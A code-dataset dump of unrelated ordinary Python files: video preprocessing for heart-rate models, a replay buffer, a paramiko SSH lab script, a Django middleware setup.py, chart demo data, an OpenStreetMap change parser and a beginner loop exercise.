id (stringlengths 2-8) | text (stringlengths 16-264k) | dataset_id (stringclasses: 1 value) |
---|---|---|
4867699
|
<gh_stars>0
import multiprocessing
import os
import h5py
from utils.image_preprocess import Deepphys_preprocess_Video, PhysNet_preprocess_Video
from utils.text_preprocess import Deepphys_preprocess_Label, PhysNet_preprocess_Label
def preprocessing(save_root_path: str = "/media/hdd1/dy/dataset/",
model_name: str = "DeepPhys",
data_root_path: str = "/media/hdd1/",
dataset_name: str = "UBFC",
train_ratio: float = 0.8):
"""
:param save_root_path: save file destination path
:param model_name: select preprocessing method
:param data_root_path: dataset root path
:param dataset_name: dataset name (e.g. UBFC, COFACE)
:param train_ratio: train/test split ratio [train_ratio : 1 - train_ratio]
:return:
"""
print("preprocessing start!")
dataset_root_path = data_root_path + dataset_name
manager = multiprocessing.Manager()
return_dict = manager.dict()
data_list = [data for data in os.listdir(dataset_root_path) if "subject" in data]
process = []
print(data_list)
# multiprocessing
for index, data_path in enumerate(data_list):
proc = multiprocessing.Process(target=preprocess_Dataset,
args=(dataset_root_path + "/" + data_path, True, model_name, return_dict))
process.append(proc)
proc.start()
for proc in process:
proc.join()
train = int(len(return_dict.keys()) * train_ratio) # split dataset
train_file = h5py.File(save_root_path + model_name + "_" + dataset_name + "_train.hdf5", "w")
for index, data_path in enumerate(return_dict.keys()[:train]):
dset = train_file.create_group(data_path)
dset['preprocessed_video'] = return_dict[data_path]['preprocessed_video']
dset['preprocessed_label'] = return_dict[data_path]['preprocessed_label']
train_file.close()
test_file = h5py.File(save_root_path + model_name + "_" + dataset_name + "_test.hdf5", "w")
for index, data_path in enumerate(return_dict.keys()[train:]):
dset = test_file.create_group(data_path)
dset['preprocessed_video'] = return_dict[data_path]['preprocessed_video']
dset['preprocessed_label'] = return_dict[data_path]['preprocessed_label']
test_file.close()
def preprocess_Dataset(path, flag, model_name, return_dict):
"""
:param path: dataset path
:param flag: face detect flag
:param model_name: select preprocessing method
:param return_dict: shared dict holding the preprocessed video and label per subject
"""
if model_name == "DeepPhys":
rst, preprocessed_video = Deepphys_preprocess_Video(path + "/vid.avi", flag)
elif model_name == "PhysNet" or model_name == "PhysNet_LSTM":
rst, preprocessed_video = PhysNet_preprocess_Video(path + "/vid.avi", flag)
if not rst: # can't detect face
return
if model_name == "DeepPhys":
preprocessed_label = Deepphys_preprocess_Label(path + "/ground_truth.txt")
elif model_name == "PhysNet" or model_name == "PhysNet_LSTM":
preprocessed_label = PhysNet_preprocess_Label(path + "/ground_truth.txt")
return_dict[path.split("/")[-1]] = {'preprocessed_video': preprocessed_video,
'preprocessed_label': preprocessed_label}
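# A minimal usage sketch (not part of the original script); the paths below are
# placeholders and assume the directory layout described in the docstring above.
if __name__ == "__main__":
    preprocessing(save_root_path="/tmp/preprocessed/",
                  model_name="PhysNet",
                  data_root_path="/tmp/data/",
                  dataset_name="UBFC",
                  train_ratio=0.8)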
|
StarcoderdataPython
|
3546454
|
import numpy as np
import heapq
import random
from itertools import count
import torch
class Transition_tuple():
def __init__(self, state, action, action_mean, reward, curiosity, next_state, done_mask, t):
# expects a list of items for each initialization variable
self.state = np.array(state)
self.action = np.array(action)
self.action_mean = np.array(action_mean)
self.reward = np.array(reward)
self.curiosity = np.array(curiosity)
self.next_state = np.array(next_state)
self.done_mask = np.array(done_mask)
self.t = np.array(t)
def get_all_attributes(self):
return [self.state, self.action, self.action_mean, self.reward, self.curiosity, self.next_state, self.done_mask, self.t]
class Curious_Reservoir():
def __init__(self, capacity=10000):
self.capacity = capacity
self.storage = [[]]
self.residual_buffer = []
self.tiebreaker = count()
self.current_index = 0
self.no_tasks = 1
self.individual_buffer_capacity = capacity
self.time = 0
self.split_sizes = [0]
def push(self, state, action, action_mean, reward, curiosity, next_state, done_mask, tiebreaker):
self.time = next(self.tiebreaker)
data = (state, action, action_mean, reward, curiosity, next_state, done_mask, tiebreaker)
if not isinstance(curiosity, torch.Tensor):
priority = curiosity
else:
priority = curiosity.item()
if tiebreaker is None:
tiebreaker = self.time
d = (priority, tiebreaker, data)
old_data = None
if len(self.storage[self.current_index]) < self.individual_buffer_capacity:
heapq.heappush(self.storage[self.current_index], d)
pushed = True
old_data = None
elif priority > self.storage[self.current_index][0][0]:
old_data = heapq.heapreplace(self.storage[self.current_index], d)
pushed = True
else:
pushed = False
if pushed:
if len(self.residual_buffer) != 0:
self.residual_buffer.pop(0)
if not pushed:
return pushed, data
else:
return pushed, old_data
def get_total_buffer_data(self):
S = []
for buff in self.storage:
S += buff
S += self.residual_buffer
return S
def sample(self, batch_size):
indices = self.get_sample_indices(batch_size)
state, action, action_mean, reward, curiosity, next_state, done_mask, t_array = self.encode_sample(
indices=indices)
return Transition_tuple(state, action, action_mean, reward, curiosity, next_state, done_mask, t_array)
def encode_sample(self, indices):
state, action, action_mean, reward, curiosity, next_state, done_mask, t_array = [], [], [], [], [], [], [], []
for (j,idxs) in enumerate(indices):
for i in idxs:
if j == 0:
data = self.residual_buffer[i][2]
else:
data = self.storage[j-1][i][2]
s, a, a_m, r, c, n_s, d, t = data
state.append(s)
action.append(a)
action_mean.append(a_m)
reward.append(r)
curiosity.append(c)
next_state.append(n_s)
done_mask.append(d)
t_array.append(t)
return state, action, action_mean, reward, curiosity, next_state, done_mask, t_array
def get_sample_indices(self, batch_size):
prop = self.get_proportion()
batch_sizes = []
temp = 0
#for i in range(len(self.storage)-1):
for i in range(len(self.storage)):
temp += int(batch_size*prop[i])
batch_sizes.append(int(batch_size*prop[i]))
batch_sizes.append(batch_size-temp) #this for residual buffer
indices = []
for (i,buff) in enumerate(self.storage):
if len(buff) < self.individual_buffer_capacity:
indices.append(np.random.choice(len(buff), batch_sizes[i]))
else:
indices.append(np.random.choice(self.individual_buffer_capacity, batch_sizes[i]))
#for residual buffer
buff = self.residual_buffer
if len(buff) != 0:
indices.insert(0, np.random.choice(len(buff), batch_sizes[-1]))
else:
indices.insert(0, np.array([]))
# indices at which we can perform the task split for IRM
# (including the residual buffer, so you may ignore it)
"""
self.split_indices = []
curr_index = 0
for i in range(len(self.storage)):
curr_index = curr_index + len(indices[i])
self.split_indices.append(curr_index)
"""
self.split_sizes = [len(inx) for inx in indices]
self.debug = [prop, batch_size, self.split_sizes, batch_sizes, len(self.residual_buffer) ]
return indices
def get_all_buff_sizes(self):
buff_size = [len(buff) for buff in self.storage]
return buff_size
def get_proportion(self):
size = self.__len__()
if size == 0:
return [1.0]
prop = []
for buff in self.storage:
prop.append(len(buff)/size)
prop.append(len(self.residual_buffer)/size)
return prop
def __len__(self):
l = 0
for buff in self.storage:
l += len(buff)
l += len(self.residual_buffer)
return l
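# A minimal usage sketch (not part of the original file). The state/action shapes
# are arbitrary placeholders; push() accepts a curiosity score as a float or a
# torch.Tensor, and sample() returns a Transition_tuple of stacked arrays.
if __name__ == "__main__":
    buffer = Curious_Reservoir(capacity=100)
    s = np.zeros(4)
    a = np.zeros(2)
    for step in range(200):
        buffer.push(s, a, a, reward=1.0, curiosity=float(step),
                    next_state=s, done_mask=0.0, tiebreaker=None)
    batch = buffer.sample(batch_size=8)
    print(batch.state.shape, batch.reward.shape)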
|
StarcoderdataPython
|
1802337
|
import paramiko
import time
ip = '172.16.17.32'
username = 'pyclass'
password = '<PASSWORD>'
remote_conn=paramiko.SSHClient()
# avoid issues with untrusted target hosts
remote_conn.set_missing_host_key_policy(paramiko.AutoAddPolicy())
remote_conn.connect(ip, username=username, password=password, look_for_keys=False, allow_agent=False)
remote_conn02 = remote_conn.invoke_shell()
output = remote_conn02.recv(1000)
print(output)
remote_conn02.send("conf t\n")
output = remote_conn02.recv(5000)
print(output)
|
StarcoderdataPython
|
6429870
|
<filename>setup.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from setuptools import setup, find_packages
MIDDLEWARE_BASE_DIR = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(MIDDLEWARE_BASE_DIR, 'README.md')) as f:
long_description = f.read()
setup(
name='shein-django-jaeger-middleware',
license='MIT',
version='0.2.9',
description='python(django) tracing middleware tool: django-jaeger-middleware',
long_description=long_description,
long_description_content_type="text/markdown",
author='zhangpanpan',
author_email='<EMAIL>',
url='https://github.com/lpf32/shein-django-jaeger-middleware',
packages=find_packages(),
install_requires=[
"jaeger_client",
"opentracing",
"requests"
],
keywords=['django', 'jaeger', 'jaegertracing', 'requests'],
classifiers=[
"Framework :: Django",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
zip_safe=False
)
|
StarcoderdataPython
|
8102501
|
<gh_stars>100-1000
from .models import Account
DB_HOST = ["localhost"]
DB_PORT = 27017
def get_db(db_name):
import pymongo
DB_HOST = ["localhost"]
DB_PORT = 27017
db = pymongo.Connection(DB_HOST, DB_PORT)[db_name]
return db
def get_mongo_cursor(db_name, collection_name, max_docs=100):
import pymongo
db = pymongo.Connection(host=DB_HOST,
port=DB_PORT)[db_name]
collection = db[collection_name]
cursor = collection.find()
count = cursor.count
if callable(count):
count = count()
if count >= max_docs:
cursor = cursor[0:max_docs]
return cursor
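# A minimal usage sketch (not part of the original module). It assumes a MongoDB
# server is reachable at localhost:27017; the database and collection names are
# placeholders.
def print_sample_docs():
    cursor = get_mongo_cursor("accounts", "docs", max_docs=5)
    for doc in cursor:
        print(doc)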
data = [
['Year', 'Sales', 'Expenses', 'Items Sold', 'Net Profit'],
['2004', 1000, 400, 100, 600],
['2005', 1170, 460, 120, 710],
['2006', 660, 1120, 50, -460],
['2007', 1030, 540, 100, 490],
]
candlestick_data = [['Mon', 20, 28, 38, 45],
['Tue', 31, 38, 55, 66],
['Wed', 50, 55, 77, 80],
['Thu', 77, 77, 66, 50],
['Fri', 68, 66, 22, 15]]
# TODO: Come up with a better example
scatter_multi_series_data = [
['state','country','Rainfall', 'Precipitation'],
['Uttar Pradesh','India',1, 2],
['Bihar','India',2, 3],
['Telangana','India',5, 7],
['Lahore','Pakistan',9,8],
['Hyderabad','Pakistan',8,7],
['Lahore','Pakistan',3,11]
]
# TODO: Come up with a better example
scatter_single_series_data = [
['Leader', 'Rainfall', 'Precipitation'],
['Trump', 1, 2],
['Clinton', 2, 3],
['Trumps', 5, 7],
['George', 6, 9],
['Alex', 7, 4],
['Donald', 7, 8],
]
treemap_data = [
['Location', 'Parent', 'Market trade volume (size)', 'Market increase/decrease (color)'],
['Global', None, 0, 0],
['America', 'Global', 0, 0],
['Europe', 'Global', 0, 0],
['Asia', 'Global', 0, 0],
['Australia', 'Global', 0, 0],
['Africa', 'Global', 0, 0],
['Brazil', 'America', 11, 10],
['USA', 'America', 52, 31],
['Mexico', 'America', 24, 12],
['Canada', 'America', 16, -23],
['France', 'Europe', 42, -11],
['Germany', 'Europe', 31, -2],
['Sweden', 'Europe', 22, -13],
['Italy', 'Europe', 17, 4],
['UK', 'Europe', 21, -5],
['China', 'Asia', 36, 4],
['Japan', 'Asia', 20, -12],
['India', 'Asia', 40, 63],
['Laos', 'Asia', 4, 34],
['Mongolia', 'Asia', 1, -5],
['Israel', 'Asia', 12, 24],
['Iran', 'Asia', 18, 13],
['Pakistan', 'Asia', 11, -52],
['Egypt', 'Africa', 21, 0],
['S. Africa', 'Africa', 30, 43],
['Sudan', 'Africa', 12, 2],
['Congo', 'Africa', 10, 12],
['Zaire', 'Africa', 8, 10]]
# map_data = [
# ['Country', 'Value'],
# ['fo', 0],
# ['um', 1],
# ['us', 2],
# ['jp', 3],
# ['sc', 4],
# ['in', 5],
# ['fr', 6],
# ['fm', 7],
# ['cn', 8],
# ['pt', 9],
# ['sw', 10],
# ['sh', 11],
# ['br', 12],
# ['ki', 13],
# ['ph', 14],
# ['mx', 15],
# ['es', 16],
# ['bu', 17],
# ['mv', 18],
# ['sp', 19],
# ['gb', 20],
# ['gr', 21],
# ['as', 22],
# ['dk', 23],
# ['gl', 24],
# ['gu', 25],
# ['mp', 26],
# ['pr', 27],
# ['vi', 28],
# ['ca', 29],
# ['st', 30],
# ['cv', 31],
# ['dm', 32],
# ['nl', 33],
# ['jm', 34],
# ['ws', 35],
# ['om', 36],
# ['vc', 37],
# ['tr', 38],
# ['bd', 39],
# ['lc', 40],
# ['nr', 41],
# ['no', 42],
# ['kn', 43],
# ['bh', 44],
# ['to', 45],
# ['fi', 46],
# ['id', 47],
# ['mu', 48],
# ['se', 49],
# ['tt', 50],
# ['my', 51],
# ['pa', 52],
# ['pw', 53],
# ['tv', 54],
# ['mh', 55],
# ['cl', 56],
# ['th', 57],
# ['gd', 58],
# ['ee', 59],
# ['ad', 60],
# ['tw', 61],
# ['bb', 62],
# ['it', 63],
# ['mt', 64],
# ['vu', 65],
# ['sg', 66],
# ['cy', 67],
# ['lk', 68],
# ['km', 69],
# ['fj', 70],
# ['ru', 71],
# ['va', 72],
# ['sm', 73],
# ['kz', 74],
# ['az', 75],
# ['tj', 76],
# ['ls', 77],
# ['uz', 78],
# ['ma', 79],
# ['co', 80],
# ['tl', 81],
# ['tz', 82],
# ['ar', 83],
# ['sa', 84],
# ['pk', 85],
# ['ye', 86],
# ['ae', 87],
# ['ke', 88],
# ['pe', 89],
# ['do', 90],
# ['ht', 91],
# ['pg', 92],
# ['ao', 93],
# ['kh', 94],
# ['vn', 95],
# ['mz', 96],
# ['cr', 97],
# ['bj', 98],
# ['ng', 99],
# ['ir', 100],
# ['sv', 101],
# ['sl', 102],
# ['gw', 103],
# ['hr', 104],
# ['bz', 105],
# ['za', 106],
# ['cf', 107],
# ['sd', 108],
# ['cd', 109],
# ['kw', 110],
# ['de', 111],
# ['be', 112],
# ['ie', 113],
# ['kp', 114],
# ['kr', 115],
# ['gy', 116],
# ['hn', 117],
# ['mm', 118],
# ['ga', 119],
# ['gq', 120],
# ['ni', 121],
# ['lv', 122],
# ['ug', 123],
# ['mw', 124],
# ['am', 125],
# ['sx', 126],
# ['tm', 127],
# ['zm', 128],
# ['nc', 129],
# ['mr', 130],
# ['dz', 131],
# ['lt', 132],
# ['et', 133],
# ['er', 134],
# ['gh', 135],
# ['si', 136],
# ['gt', 137],
# ['ba', 138],
# ['jo', 139],
# ['sy', 140],
# ['mc', 141],
# ['al', 142],
# ['uy', 143],
# ['cnm', 144],
# ['mn', 145],
# ['rw', 146],
# ['so', 147],
# ['bo', 148],
# ['cm', 149],
# ['cg', 150],
# ['eh', 151],
# ['rs', 152],
# ['me', 153],
# ['tg', 154],
# ['la', 155],
# ['af', 156],
# ['ua', 157],
# ['sk', 158],
# ['jk', 159],
# ['bg', 160],
# ['qa', 161],
# ['li', 162],
# ['at', 163],
# ['sz', 164],
# ['hu', 165],
# ['ro', 166],
# ['ne', 167],
# ['lu', 168],
# ['ad', 169],
# ['ci', 170],
# ['lr', 171],
# ['bn', 172],
# ['iq', 173],
# ['ge', 174],
# ['gm', 175],
# ['ch', 176],
# ['td', 177],
# ['kv', 178],
# ['lb', 179],
# ['dj', 180],
# ['bi', 181],
# ['sr', 182],
# ['il', 183],
# ['ml', 184],
# ['sn', 185],
# ['gn', 186],
# ['zw', 187],
# ['pl', 188],
# ['mk', 189],
# ['py', 190],
# ['by', 191],
# ['ca', 192],
# ['bf', 193],
# ['na', 194],
# ['ly', 195],
# ['tn', 196],
# ['bt', 197],
# ['md', 198],
# ['ss', 199],
# ['bw', 200],
# ['bs', 201],
# ['nz', 202],
# ['cu', 203],
# ['ec', 204],
# ['au', 205],
# ['ve', 206],
# ['sb', 207],
# ['mg', 208],
# ['is', 209],
# ['eg', 210],
# ['kg', 211],
# ['np', 212]
# ]
map_data = [
['Country', 'Value'],
['fo', 0],
['um', 1],
['us', 2],
['jp', 3],
['sc', 4],
['in', 5],
['fr', 6],
['fm', 7],
['cn', 8],
['pt', 9],
['sw', 10],
['sh', 11],
['br', 12],
['ki', 13],
['ph', 14],
['mx', 15],
['es', 16],
['bu', 17],
['mv', 18],
['sp', 19],
['gb', 20],
['gr', 21],
['as', 22],
['dk', 23],
['gl', 24],
['gu', 25],
['mp', 26],
['pr', 27],
['vi', 28],
['ca', 29],
['st', 30],
['cv', 31],
['dm', 32],
['nl', 33],
['jm', 34],
['ws', 35],
['om', 36],
['vc', 37],
['tr', 38],
['bd', 39],
['lc', 40],
['nr', 41],
['no', 42],
['kn', 43],
['bh', 44],
['to', 45],
['fi', 46],
['id', 47],
['mu', 48],
['se', 49],
['tt', 50],
['my', 51],
['pa', 52],
['pw', 53],
['tv', 54],
['mh', 55],
['cl', 56],
['th', 57],
['gd', 58],
['ee', 59],
['ad', 60],
['tw', 61],
['bb', 62],
['it', 63],
['mt', 64],
['vu', 65],
['sg', 66],
['cy', 67],
['lk', 68],
['km', 69],
['fj', 70],
['ru', 71],
['va', 72],
['sm', 73],
['kz', 74],
['az', 75],
['tj', 76],
['ls', 77],
['uz', 78],
['ma', 79],
['co', 80],
['tl', 81],
['tz', 82],
['ar', 83],
['sa', 84],
['pk', 85],
['ye', 86],
['ae', 87],
['ke', 88],
['pe', 89],
['do', 90],
['ht', 91],
['pg', 92],
['ao', 93],
['kh', 94],
['vn', 95],
['mz', 96],
['cr', 97],
['bj', 98],
['ng', 99]
]
map_data_us_multi_series_lat_lon = [
['Latitude', 'Longitude', 'Winner', 'Seats'],
[32.380120, -86.300629, 'Trump', 10],
[58.299740, -134.406794, 'Trump', 10],
[33.448260, -112.075774, 'Trump', 10],
[34.748655, -92.274494, 'Clinton', 20],
[38.579065, -121.491014, 'Clinton', 20],
]
map_data_us_multi_series = [
['State', 'Winner', 'Seats'],
['us-nj', 'Trump', 10],
['us-ri', 'Trump', 10],
['us-ma', 'Trump', 10],
['us-ct', 'Clinton', 20],
['us-md', 'Clinton', 20],
['us-ny', 'Clinton', 20],
['us-de', 'Trump', 20],
['us-fl', 'Trump', 20],
['us-oh', 'Trump', 20],
['us-pa', 'Trump', 20],
['us-li', 'Trump', 20],
['us-ca', 'Trump', 20],
['us-hi', 'Trump', 20],
['us-va', 'Trump', 31],
['us-mi', 'Trump', 31],
['us-in', 'Trump', 31],
['us-nc', 'Trump', 31],
['us-ga', 'Trump', 31],
['us-tn', 'Trump', 31],
['us-nh', 'Trump', 31],
['us-sc', 'Trump', 31],
['us-la', 'Trump', 31],
['us-ky', 'Trump', 31],
['us-wi', 'Trump', 12],
['us-wa', 'Trump', 12],
['us-al', 'Clinton', 12],
['us-mo', 'Clinton', 12],
['us-tx', 'Clinton', 45],
['us-wv', 'Clinton', 45],
]
map_data_us_lat_lon = [
['Latitude', 'Longitude', 'Population'],
[32.380120, -86.300629, 900],
[58.299740, -134.406794, 387],
[33.448260, -112.075774, 313],
]
map_data_india_lat_lon = [
['Latitude', 'Longitude', 'Population'],
[25.4851484, 83.2104426, 900],
[27.7126407, 78.7391187, 387],
[28.2699017, 79.1604971, 313],
]
map_data_us = [
['State', 'Population'],
['us-nj', 438],
['us-ri', 387],
['us-ma', 313],
['us-ct', 271],
['us-md', 209],
['us-ny', 195],
['us-de', 155],
['us-fl', 114],
['us-oh', 107],
['us-pa', 106],
['us-li', 86],
['us-ca', 84],
['us-hi', 73],
['us-va', 69],
['us-mi', 68],
['us-in', 65],
['us-nc', 64],
['us-ga', 55],
['us-tn', 53],
['us-nh', 53],
['us-sc', 51],
['us-la', 40],
['us-ky', 39],
['us-wi', 38],
['us-wa', 34],
['us-al', 34],
['us-mo', 31],
['us-tx', 31],
['us-wv', 29],
['us-vt', 25],
['us-mn', 24],
['us-ms', 23],
['us-ia', 20],
['us-ar', 20],
['us-ok', 19],
['us-az', 17],
['us-co', 16],
['us-me', 16],
['us-or', 14],
['us-ks', 13],
['us-ut', 11],
['us-ne', 9],
['us-nv', 7],
['us-id', 6],
['us-nm', 6],
['us-sd', 4],
['us-nd', 4],
['us-mt', 2],
['us-wy', 2],
['us-ak', 1],
]
map_data_us_point = [
['Lat', 'Lon', 'Name', 'Date'],
[46.8797, -110.3626, 'trump', '25th February'],
[41.4925, -99.9018, 'trump', '26th February'],
[45.4925, -89.9018, 'trump', '27th February'],
[32.1656, -82.9001, 'clinton', '25th February'],
[33.1656, -81.9001, 'clinton', '26th February'],
]
mongo_series_object_1 = [[440, 39],
[488, 29.25],
[536, 28],
[584, 29],
[632, 33.25],
[728, 28.5],
[776, 33.25],
[824, 28.5],
[872, 31],
[920, 30.75],
[968, 26.25]]
mongo_series_object_2 = [[400, 4],
[488, 0],
[536, 20],
[584, 8],
[632, 2],
[680, 36],
[728, 0],
[776, 0],
[824, 0],
[872, 4],
[920, 1],
[968, 0]]
mongo_data = [{'data': mongo_series_object_1, 'label': 'hours'},
{'data': mongo_series_object_2, 'label': 'hours'}]
def create_demo_accounts():
Account.objects.all().delete()
# Create some rows
Account.objects.create(year="2004", sales=1000,
expenses=400, ceo="Welch")
Account.objects.create(year="2005", sales=1170,
expenses=460, ceo="Jobs")
Account.objects.create(year="2006", sales=660,
expenses=1120, ceo="Page")
Account.objects.create(year="2007", sales=1030,
expenses=540, ceo="Welch")
Account.objects.create(year="2008", sales=2030,
expenses=1540, ceo="Zuck")
Account.objects.create(year="2009", sales=2230,
expenses=1840, ceo="Cook")
def create_demo_mongo():
accounts = get_db("accounts")
docs = accounts.docs
docs.drop()
docs = accounts.docs
header = data[0]
data_only = data[1:]
for row in data_only:
docs.insert(dict(zip(header, row)))
heatmap_data = [['Name', 'Yash', 'Akshar', 'Ashok','Shabda'],
['Uttar Pradesh',1000,2000,3000,4000],
['Bihar',2000,5000,8000,9800],
['Hyderabad',10000,9855,6000,2000],
['Banglore',98652,78563,8522,2000],
['Chennai',98745,8563,5236,2000],
['Vizag',9875,7000,966,2300],
['Maharashtra',9000,16789,9087,6789],
['Punjab',3467,8900,5670,9900]
]
funnel_data = [['Unique users', 'Counts'],
['Website visits', 654],
['Downloads', 4064],
['Requested price list', 1987],
['Invoice sent', 976],
['Finalized', 846]
]
treemap_data_highcharts = [["Continent","Country","Cause","Death Rate"],
["Asia","India","Cardiovascular Disease",10],
["Asia","India","Road Accident",5],
["Asia","India","Cancer",3],
["Asia","China","Cardiovascular Disease",9],
["Asia","China","Road Accident",6],
["Asia","China","Cancer",1],
["South Ameria","Brazil","Cardiovascular Disease",11],
["South Ameria","Brazil","Road Accident",3],
["South Ameria","Brazil","Cancer",2],
["South Ameria","Uruguay","Cardiovascular Disease",12],
["South Ameria","Uruguay","Road Accident",9],
["South Ameria","Uruguay","Cancer",8],
["Europe","France","Cardiovascular Disease",9],
["Europe","France","Road Accident",4],
["Europe","France","Cancer",6]
]
piechart_data_highcharts = [["Country","Cause","Death Rate"],
["India","Cardiovascular Disease",10],
["India","Road Accident",5],
["India","Cancer",3],
["China","Cardiovascular Disease",9],
["China","Road Accident",6],
["China","Cancer",1],
["Brazil","Cardiovascular Disease",11],
["Brazil","Road Accident",3],
["Brazil","Cancer",2],
["Uruguay","Cardiovascular Disease",12],
["Uruguay","Road Accident",9],
["Uruguay","Cancer",8],
["France","Cardiovascular Disease",9],
["France","Road Accident",4],
["France","Cancer",6]
]
bubble_chart_data_multi = [["Grade","Country","Sugar Consumption","Fat Consumption","GDP"],
["A","India",10,15,90],
["B","India",11,20,19],
["C","India",12,15,70],
["D","India",13,30,39],
["E","India",14,12,9],
["F","India",15,5,98],
["H","Japan",18,60,110],
["I","Japan", 41, 16, 140],
["J","Japan", 47, 36, 150],
["K","Japan", 61, 56, 70],
["L","Japan", 74, 36, 210],
["M","Japan", 10, 46, 90],
["N","Japan", 30, 26, 100],
["O","China",14,18,100],
["A","China", 9, 17, 10],
["B","China", 51, 67, 200],
["C","China", 12, 27, 160],
["D","China", 42, 67, 86],
["E","China", 30, 97, 20],
["F","China", 16, 67, 90],
["L","USA",56,20,120],
["K","USA", 32, 23, 220],
["A","USA", 15, 85, 320],
["S","USA", 48, 10, 20],
["D","USA", 30, 96, 150],
["K","USA", 14, 22, 160],
["P","USA", 39, 21, 100],
["O","USA", 44, 29, 150]]
bubble_chart_data_single = [["Country","Sugar Consumption","Fat Consumption","GDP"],
["India",10,15,90],
["USA",11,20,19],
["China",12,15,70],
["Japan",13,30,39],
["Pakistan",14,12,9],
["Srilanka",15,5,98],
["Indonesia",16,35,150]]
|
StarcoderdataPython
|
11303754
|
<filename>osm_validator/osm_change.py
from datetime import datetime
from io import BytesIO
from lxml import etree
class Node(object):
__slots__ = ('id', 'version', 'timestamp', 'uid', 'user', 'changeset', 'lat', 'lon', 'tags')
def __init__(self, *, id, version, timestamp, uid, user, changeset, lat, lon, tags):
self.id = id
self.version = version
self.timestamp = timestamp
self.uid = uid
self.user = user
self.changeset = changeset
self.lat = lat
self.lon = lon
self.tags = tags
def __eq__(self, other):
return (self.id, self.version) == (other.id, other.version)
def __hash__(self):
return hash((self.id, self.version))
@staticmethod
def from_xml(item):
id = int(item.attrib['id'])
version = int(item.attrib['version'])
timestamp = datetime.strptime(item.attrib['timestamp'], '%Y-%m-%dT%H:%M:%SZ')
uid = int(item.attrib['uid'])
user = item.attrib['user']
changeset = int(item.attrib['changeset'])
lat = float(item.attrib['lat'])
lon = float(item.attrib['lon'])
tags = {x.attrib['k']: x.attrib['v'] for x in item.getchildren()}
return Node(
id=id,
version=version,
timestamp=timestamp,
uid=uid,
user=user,
changeset=changeset,
lat=lat,
lon=lon,
tags=tags,
)
class Way(object):
__slots__ = ('id', 'version', 'timestamp', 'uid', 'user', 'changeset', 'nodes', 'tags')
def __init__(self, *, id, version, timestamp, uid, user, changeset, nodes, tags):
self.id = id
self.version = version
self.timestamp = timestamp
self.uid = uid
self.user = user
self.changeset = changeset
self.nodes = nodes
self.tags = tags
def __eq__(self, other):
return (self.id, self.version) == (other.id, other.version)
def __hash__(self):
return hash((self.id, self.version))
@staticmethod
def from_xml(item):
id = int(item.attrib['id'])
version = int(item.attrib['version'])
timestamp = datetime.strptime(item.attrib['timestamp'], '%Y-%m-%dT%H:%M:%SZ')
uid = int(item.attrib['uid'])
user = item.attrib['user']
changeset = int(item.attrib['changeset'])
nodes = []
tags = {}
for x in item.getchildren():
if x.tag == 'nd':
nodes.append(int(x.attrib['ref']))
else:
tags[x.attrib['k']] = x.attrib['v']
return Way(
id=id,
version=version,
timestamp=timestamp,
uid=uid,
user=user,
changeset=changeset,
nodes=tuple(nodes),
tags=tags,
)
class Member(object):
__slots__ = ('type', 'ref', 'role')
def __init__(self, *, type, ref, role):
self.type = type
self.ref = ref
self.role = role
def __eq__(self, other):
return (self.type, self.ref, self.role) == (other.type, other.ref, other.role)
def __hash__(self):
return hash((self.type, self.ref, self.role))
class Relation(object):
__slots__ = ('id', 'version', 'timestamp', 'uid', 'user', 'changeset', 'members', 'tags')
def __init__(self, *, id, version, timestamp, uid, user, changeset, members, tags):
self.id = id
self.version = version
self.timestamp = timestamp
self.uid = uid
self.user = user
self.changeset = changeset
self.members = members
self.tags = tags
def __eq__(self, other):
return (self.id, self.version) == (other.id, other.version)
def __hash__(self):
return hash((self.id, self.version))
@staticmethod
def from_xml(item):
id = int(item.attrib['id'])
version = int(item.attrib['version'])
timestamp = datetime.strptime(item.attrib['timestamp'], '%Y-%m-%dT%H:%M:%SZ')
uid = int(item.attrib['uid'])
user = item.attrib['user']
changeset = int(item.attrib['changeset'])
members = []
tags = {}
for x in item.getchildren():
if x.tag == 'member':
members.append(Member(
type=x.attrib['type'],
ref=int(x.attrib['ref']),
role=x.attrib['role'],
))
else:
tags[x.attrib['k']] = x.attrib['v']
return Relation(
id=id,
version=version,
timestamp=timestamp,
uid=uid,
user=user,
changeset=changeset,
members=tuple(members),
tags=tags,
)
class OsmChange(object):
__slots__ = ('changeset',
'created_nodes', 'created_ways', 'created_relations',
'deleted_nodes', 'deleted_ways', 'deleted_relations',
'modified_nodes', 'modified_ways', 'modified_relations')
def __init__(self, changeset):
self.changeset = changeset
self.created_nodes = set()
self.created_ways = set()
self.created_relations = set()
self.deleted_nodes = set()
self.deleted_ways = set()
self.deleted_relations = set()
self.modified_nodes = set()
self.modified_ways = set()
self.modified_relations = set()
def __eq__(self, other):
return self.changeset == other.changeset
def __hash__(self):
return hash(self.changeset)
class OsmChangeList(object):
def __init__(self, changes, affected_node_ids, affected_way_ids, affected_rel_ids):
self.changes = changes
self.affected_node_ids = affected_node_ids
self.affected_way_ids = affected_way_ids
self.affected_rel_ids = affected_rel_ids
def parse_osc(file):
match_type = {
'node': Node,
'way': Way,
'relation': Relation,
}
match_path = {
('create', 'node'): 'created_nodes',
('create', 'way'): 'created_ways',
('create', 'relation'): 'created_relations',
('delete', 'node'): 'deleted_nodes',
('delete', 'way'): 'deleted_ways',
('delete', 'relation'): 'deleted_relations',
('modify', 'node'): 'modified_nodes',
('modify', 'way'): 'modified_ways',
('modify', 'relation'): 'modified_relations',
}
changes = {}
affected_ids = {
'node': set(),
'way': set(),
'relation': set(),
}
for event, element in etree.iterparse(BytesIO(file)):
if element.tag not in ['modify', 'delete', 'create']:
continue
for item in element.getchildren():
instance = match_type[item.tag].from_xml(item)
if instance.changeset not in changes:
changes[instance.changeset] = OsmChange(instance.changeset)
getattr(changes[instance.changeset], match_path[(element.tag, item.tag)]).add(instance)
affected_ids[item.tag].add(instance.id)
return OsmChangeList(
tuple(sorted(changes.values(), key=lambda c: c.changeset)),
affected_ids['node'], affected_ids['way'], affected_ids['relation'],
)
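# A minimal usage sketch (not part of the original module): parse_osc() expects the
# raw bytes of an OsmChange (.osc) XML document; the file path is a placeholder.
if __name__ == '__main__':
    with open('changes.osc', 'rb') as f:
        change_list = parse_osc(f.read())
    for change in change_list.changes:
        print(change.changeset, len(change.created_nodes), len(change.modified_ways))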
|
StarcoderdataPython
|
8140955
|
print('===== 061 =====')
t1 = float(input('digite o primeiro termo: '))
r = float(input('digite a razão: '))
cont = 1
t = t1
while cont <= 10:
print(f'{int(t)}', end=' ')
cont += 1
t += r
